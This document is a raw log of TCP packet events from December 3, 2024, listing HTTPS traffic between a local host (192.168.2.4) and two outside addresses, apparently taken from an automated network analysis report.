                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.673969984 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674000025 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674079895 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674379110 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674443960 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674500942 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674586058 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674603939 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674871922 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.674887896 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.686758041 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.686830044 CET44349791104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.686902046 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.687136889 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.687154055 CET44349791104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.917768955 CET44349791104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.918045998 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.918082952 CET44349791104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919142962 CET44349791104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919207096 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919523001 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919538021 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919589996 CET44349791104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919625998 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919646978 CET49791443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919950008 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.919984102 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.920057058 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.920250893 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:15.920264006 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.259094954 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.259335041 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.259362936 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.260207891 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.260267973 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.261076927 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.261257887 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.261313915 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.261442900 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.261452913 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.261590004 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.261599064 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.262296915 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.262356043 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.263142109 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.263192892 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.310050011 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.310050964 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.310056925 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.355788946 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.725080967 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.725147963 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.725199938 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.725610018 CET49790443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.725625992 CET4434979052.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.729091883 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:16.771331072 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.057143927 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.057284117 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.057332993 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.057446957 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.057461977 CET4434978952.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.057471991 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.057503939 CET49789443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.059658051 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.059684038 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.059775114 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.059956074 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.059968948 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.144484997 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.144716978 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.144737005 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.145586967 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.145644903 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.145947933 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.145998001 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.146061897 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.146068096 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:17.197417021 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.318239927 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.318334103 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.318388939 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.319108009 CET49792443192.168.2.4104.21.3.44
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.319119930 CET44349792104.21.3.44192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.676991940 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.677247047 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.677263021 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.677561998 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.677841902 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.677892923 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.677982092 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:18.723339081 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.176714897 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.176729918 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.176803112 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.176815033 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.201807976 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.201910019 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.201919079 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.257522106 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.372210979 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.372220039 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.372311115 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.372319937 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.397238970 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.397247076 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.397339106 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.397350073 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.422656059 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.422665119 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.422709942 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.422738075 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.422745943 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.422755957 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.466418982 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.482140064 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.482150078 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.482198954 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.482237101 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.482264996 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.559145927 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.559153080 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.559215069 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.559237003 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.559278965 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.575402021 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.575412989 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.575480938 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.575489044 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.586049080 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.586102962 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.586132050 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.586139917 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.586165905 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.599440098 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.599488020 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.599508047 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.599522114 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.599545956 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.616384029 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.616434097 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.616455078 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.616470098 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.616491079 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.626038074 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.626091003 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.626113892 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.626122952 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.626152039 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.635618925 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.635667086 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.635675907 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.635695934 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.635716915 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.648817062 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.648886919 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.648894072 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.701797962 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.760756016 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.760765076 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.760823965 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.760850906 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.760893106 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.767992973 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.767999887 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.768086910 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.768095970 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.774980068 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.774987936 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.775062084 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.775074959 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.783890963 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.783899069 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.783957958 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.783965111 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.790391922 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.790400028 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.790477037 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.790483952 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.796787977 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.796796083 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.796860933 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.796869040 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.805227041 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.805233955 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.805299997 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.805306911 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.811975002 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.811983109 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.812064886 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.812076092 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.820269108 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.820276022 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.820352077 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.820359945 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.826642036 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.826648951 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.826699972 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.826705933 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.834214926 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.834273100 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.834283113 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.834316969 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.834326029 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.840815067 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.840886116 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.840898991 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.840907097 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.840940952 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.847223043 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.847296953 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.847304106 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.855669022 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.855760098 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.855767012 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.862298012 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.862307072 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.862382889 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.862390995 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.903047085 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.961950064 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.961960077 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.962019920 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.962037086 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.962091923 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.968286037 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.968293905 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.968358040 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.968364954 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.974920988 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.974972010 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.974997997 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.975004911 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.975047112 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.983330965 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.983412027 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.983418941 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.989898920 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.989959002 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.989979029 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.989985943 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.990017891 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.996398926 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.996469021 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:19.996475935 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.004831076 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.004915953 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.004923105 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.010014057 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.010083914 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.010091066 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.014544964 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.014624119 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.014631033 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.018635988 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.018706083 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.018712044 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.018721104 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.018781900 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.053165913 CET49793443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.053180933 CET4434979352.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.229373932 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.229412079 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:20.229473114 CET49802443192.168.2.452.123.129.14
